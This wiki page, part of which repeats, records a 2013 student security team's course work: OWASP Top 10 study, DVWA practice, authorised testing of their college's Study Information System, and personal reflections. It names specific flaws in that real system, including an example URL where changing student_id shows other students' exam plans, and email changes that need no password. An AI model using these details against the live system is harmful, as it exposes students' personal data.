* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)'''

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
We divided our roles already on the first day (which was 25 March). I was selected as a group leader (project manager), but we decided also that this is a democracy not a tyranny. :) I was happy that everybody showed up their good sides and told what they are good at.

For me, some of the tools, which we have used, were already familiar (Apache, Linux, DVWA), because I have learned them before in school (Margus’ lectures) or at home by myself. But I tried to help others (in the practice and in our group) if there was any questions.

The biggest improvement for me was the documentation part. I have documented my work before as well, but in such a big group as we had, it was first time experience for me. I got to know different ways how to do this, also now I value “same day feedback” more, because it is good to know what went well/bad on the same day, not the last one. :)

As we all were technical background-persons, cooperation was very smooth and teamwork was very enjoyable. I learned a lot about teamwork and security threats in web and how to avoid them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
Helped teaching Apache & Linux & DVWA to other participants (Due to having some experience already from before). Helping with sumorobot programming (Being from the robotics club). I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team. I learned alot about how to use and search information for security testing (XSS, CSRF and so on). I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on)

====Sandra Suviste====
'''What I did:''' researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection. Practised attacks on the DVWA. Went through the OWASP ASVS document for possible shortcomings of the SIS. Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL. Documented my own and others' work.

'''What I learned:''' a lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures. Became more experienced in working in a multinational group with English as the working language. I learned how to document my work in order to keep track of the work of the team. I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did. First of all we all made a presentations about the OWASP TOP 10. Mine was about Insecure Direct Object References. Margus learned us to do the basic attack methods in DVWA: SQL injection, XSS and CSRF. After that I had to get familiar with the SIS. I tried all the basics on SIS, changing user ids, SQL injection and XSS.

I tried this one thing all by myself that I found searching in google. I tried to upload a profile picture that had malicious .php code inside of it as a lecturer as they have right to do that. Unfortunately that didn't work and the php code was not rendered. I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.

I also learned to program sumorobots, more about Linux and Wireshark. We made the presentation structure together. And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
'''What I did?'''
* Tried to find out possible security holes from OIS site.
* Tested different attacking methods with DVWA
* SQL-injection tests into various places on OIS site.
* Tested some XSS methods
* Made presentation about Misconfigured Configuration.
* Prepared our presentation with other group members
* Spoke in daily summary
* Studied a lot of information to know what is hacking about?

'''What i learned?'''
* I learned how to use SQL-injection, XSS, Brute force, CSRF
* I learned also how to use Kali,Backtrack,Temper data, DVWA
* Working in international group
* How important documentation is
* Found out how important it is to make web-application secure

====Mika Salmela====
'''What I did?'''
* I studied hacking methods
* Tried some hacking methods with DVWA
* Iscanned website, try to find if there is some security risks
* Tried some SQL and XSS injections
* Made presentation of Sensitive Data Exposure

'''What I learned?'''
* More than basics of how to hack?
* The most common hacking methods and how to use them.
* How to do SQL and XSS injections
* Basics of hacking tools
* How to find security risks
* How to work in international team.
* Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
'''What I did:'''
* Searched for security holes in OIS student information site.
* Used DVWA tool to test sql injections and xss scripting.
* Tried some sql injections and xss scripting on OIS page
* Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
* Prepared some slides for the main presentation

'''What have I learned:'''
* Theory about OWASP TOP 10 threats
* How to do sql injections
* How to use Firefox tamperdata tool
* How to do cross-site scripting
* Completely understood what is use case and how to draw them
* How to monitor activities with Wireshark
* How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
I have learned about security breaches on the web. Have tried different parts of web for vulnerabilities and injection. Together with team learned how to make injection and XSS attacks using Linux. Through Linux was unfamiliar for me. Together with team we divided roles and found out most important points for presentation. Last but not least coworking with team and reaching same goal was one important task. I and Sandra were responsible for the final presentation structure.

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-04T14:37:53Z

Saus:

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
'''* Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

'''*Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)

'''* Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

'''* Virtual Machines (VM VirtualBox .ova files)'''
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
We divided our roles already on the first day (which was 25 March). I was selected as a group leader (project manager), but we decided also that this is a democracy not a tyranny. :) I was happy that everybody showed up their good sides and told what they are good at.

For me, some of the tools, which we have used, were already familiar (Apache, Linux, DVWA), because I have learned them before in school (Margus’ lectures) or at home by myself. But I tried to help others (in the practice and in our group) if there was any questions.

The biggest improvement for me was the documentation part. I have documented my work before as well, but in such a big group as we had, it was first time experience for me. I got to know different ways how to do this, also now I value “same day feedback” more, because it is good to know what went well/bad on the same day, not the last one. :)

As we all were technical background-persons, cooperation was very smooth and teamwork was very enjoyable. I learned a lot about teamwork and security threats in web and how to avoid them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
Helped teaching Apache & Linux & DVWA to other participants (Due to having some experience already from before). Helping with sumorobot programming (Being from the robotics club). I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team. I learned alot about how to use and search information for security testing (XSS, CSRF and so on). I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on)

====Sandra Suviste====
'''What I did:''' researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection. Practised attacks on the DVWA. Went through the OWASP ASVS document for possible shortcomings of the SIS. Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL. Documented my own and others' work.

'''What I learned:''' a lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures. Became more experienced in working in a multinational group with English as the working language. I learned how to document my work in order to keep track of the work of the team. I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did. First of all we all made a presentations about the OWASP TOP 10. Mine was about Insecure Direct Object References. Margus learned us to do the basic attack methods in DVWA: SQL injection, XSS and CSRF. After that I had to get familiar with the SIS. I tried all the basics on SIS, changing user ids, SQL injection and XSS.

I tried this one thing all by myself that I found searching in google. I tried to upload a profile picture that had malicious .php code inside of it as a lecturer as they have right to do that. Unfortunately that didn't work and the php code was not rendered. I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.

I also learned to program sumorobots, more about Linux and Wireshark. We made the presentation structure together. And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
'''What I did?'''
* Tried to find out possible security holes from OIS site.
* Tested different attacking methods with DVWA
* SQL-injection tests into various places on OIS site.
* Tested some XSS methods
* Made presentation about Misconfigured Configuration.
* Prepared our presentation with other group members
* Spoke in daily summary
* Studied a lot of information to know what is hacking about?

'''What i learned?'''
* I learned how to use SQL-injection, XSS, Brute force, CSRF
* I learned also how to use Kali,Backtrack,Temper data, DVWA
* Working in international group
* How important documentation is
* Found out how important it is to make web-application secure

====Mika Salmela====
'''What I did?'''
* I studied hacking methods
* Tried some hacking methods with DVWA
* Iscanned website, try to find if there is some security risks
* Tried some SQL and XSS injections
* Made presentation of Sensitive Data Exposure

'''What I learned?'''
* More than basics of how to hack?
* The most common hacking methods and how to use them.
* How to do SQL and XSS injections
* Basics of hacking tools
* How to find security risks
* How to work in international team.
* Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
'''What I did:'''
* Searched for security holes in OIS student information site.
* Used DVWA tool to test sql injections and xss scripting.
* Tried some sql injections and xss scripting on OIS page
* Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
* Prepared some slides for the main presentation

'''What have I learned:'''
* Theory about OWASP TOP 10 threats
* How to do sql injections
* How to use Firefox tamperdata tool
* How to do cross-site scripting
* Completely understood what is use case and how to draw them
* How to monitor activities with Wireshark
* How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
I have learned about security breaches on the web. Have tried different parts of web for vulnerabilities and injection. Together with team learned how to make injection and XSS attacks using Linux. Through Linux was unfamiliar for me. Together with team we divided roles and found out most important points for presentation. Last but not least coworking with team and reaching same goal was one important task. I and Sandra were responsible for the final presentation structure.

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===